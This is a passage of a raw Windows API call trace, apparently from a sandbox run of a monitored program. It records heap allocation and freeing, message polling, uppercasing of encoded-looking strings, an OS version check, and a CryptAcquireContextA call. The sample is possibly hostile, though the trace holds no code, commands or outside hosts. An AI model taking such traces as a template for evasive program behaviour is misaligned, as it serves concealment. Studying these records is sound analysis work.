hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0168.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.329] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0168.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0168.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.329] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0168.329] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0168.330] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0168.330] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.330] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0168.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0168.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.331] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.332] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.332] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.332] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.332] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0168.332] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0168.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.334] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0168.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.334] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.334] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0168.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0168.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0168.335] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.336] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.336] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.337] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 